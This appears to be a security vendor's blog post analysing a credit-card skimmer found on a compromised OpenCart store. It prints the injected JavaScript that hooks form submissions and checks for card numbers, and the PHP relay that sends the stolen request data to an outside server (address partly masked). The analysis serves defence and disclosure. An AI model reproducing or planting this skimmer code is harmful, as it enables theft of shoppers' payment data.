Session Stealer Script Used In OpenCart

  • December 29, 2016

With so many open-source ecommerce platforms available in the market, selling online is an appealing and easy option for any store owner. In a few clicks you can set up an online storefront and sell your products.

While the process to get the site up may be simple, there are always risks that arise when asking visitors to enter sensitive data. Credit card details are very valuable in the black market and we frequently see attacks on ecommerce sites as a way to steal payment information.

Stealing Checkout Page Sessions

One of the platforms many business owners use is OpenCart – an ecommerce shopping cart that provides powerful tools with minimal investment. The ease of use, including simple installation, has made OpenCart a popular choice.

While analyzing a compromised site using OpenCart, we discovered a new malware variation that was intercepting and stealing sensitive data from customers. The malware is categorized as a session stealer, allowing attackers to gain access to valid sessions of the checkout page and intercepting a customer’s sensitive credit card information.

Analyzing the malware

Going deeper into the analysis itself, the first call to the malicious function was added at catalog/view/javascript/jquery/jquery-2.1.1.min.js:

function send() { 
    var btn=document.querySelectorAll("button, input, submit, .btn, .button");
    for (var i=0;i<btn.length;i++) {
        var b=btn[i];
        if(b.type!='txt' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
            if(b.addEventListener) {
                b.addEventListener("click", clk, false);
            } else {
                b.attachEvent('onclick', clk);
            }
        }
    }
    var frm=document.querySelectorAll("form");
    for (var i=0;i<frm.length;i++){
        if(frm[i].addEventListener) {
            frm[i].addEventListener("submit", clk, false);
        }else {
            frm[i].attachEvent('onsubmit', clk);
        }
    }
    if(snd!=null) {
        console.clear();
        var gc = new RegExp("[0-9]{13,16}");
        var cl="0";
        if(gc.test(snd)) {
            cl="1" ;
        
var http = new XMLHttpRequest();
        http.open("POST","/system/startup.php",true);
        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        http.send("data="+snd+"&cl="+cl);
        console.clear();
    }

Intercepting User Interaction

You may have noticed that the functions send() and clk() were injected to intercept button clicks and form submissions (user interaction). This hijack technique allows the attackers to collect the names, credit cards, and content of every common form input element. Then it sends all the information via a $_POST request through the startup.php file (also modified with this code that collects the stolen information) and sends it to a server in Bulgaria:

<?php
error_reporting(0);
$id=base64_encode('redacted');
$url='hxxp://200.x.x.x/404/receiver.php';
if(!isset($_COOKIE["SESSIID"])){
  $rand=rand(1,9999999999);
  setcookie("SESSIID", $rand,time()+3600);
}else $cookie=$_COOKIE["SESSIID"];
  $url=$url.'?a='.$cookie;
  $data=base64_encode(serialize(array('request'=>$_REQUEST,'ip'=>$_SERVER['REMOTE_ADDR'],'ua'=>$_SERVER['HTTP_USER_AGENT'],'cookie'=>$cookie,'date_unix'=>time())));
  $opts = array('http' => array(
      'method'  => 'POST',
      'header'  => 'Content-type: application/x-www-form-urlencoded',
      'content' => http_build_query(array('utms'=>$id,'utmc'=>$_REQUEST['cl'],'data'=>$data))));
  $context  = stream_context_create($opts);
  file_get_contents($url, false, $context);
?>
<?php
// Error Reporting
error_reporting(E_ALL);

Now that we’ve identified the malicious code added to the compromised files, we can see how the attackers collected the credit card data. The code receives the stolen information from the jquery mentioned above and sends all the data to the attacker’s URL, defined in the variable $url.

Conclusion

Please be cautious regardless of which ecommerce platform you use. This code was not specifically designed for OpenCart and there are different variations of this malicious script being used in Magento websites as well.

While there is no 100% safety guarantee, merchants should do everything in their power to secure their environment as they are responsible for the processed data.

If you want to learn more, Daniel Cid (our Founder / CTO) released a nice intro to ecommerce and PCI Compliance. If you run OpenCart, or any other platform, we recommend using a Website Application Firewall to protect your site from attacks.

Bruno Zanelato is Sucuri's Copywriter who joined the company in 2014. As Eng - System III and working for the SOC team since 2019, his main responsibilities are (firewalls, IDS, IPS, HIDS, WAF, log management, hardening systems, PCI Compliant, IDS/IPS Signatures, Linux/BSD hardening, including developing content to highlight Sucuri's products and services and to educate the public about website security. Bruno's professional experience covers more than 15 years of deploying/managing Web Application Firewall as well as open-source security software. When Bruno isn't drafting blog posts or writing web pages, you might find him online playing MMO RPG games, watching MMA, and having fun with his kids and family during his free time. Connect with him on Linkedin

Related Tags
Related Categories
You May Also Like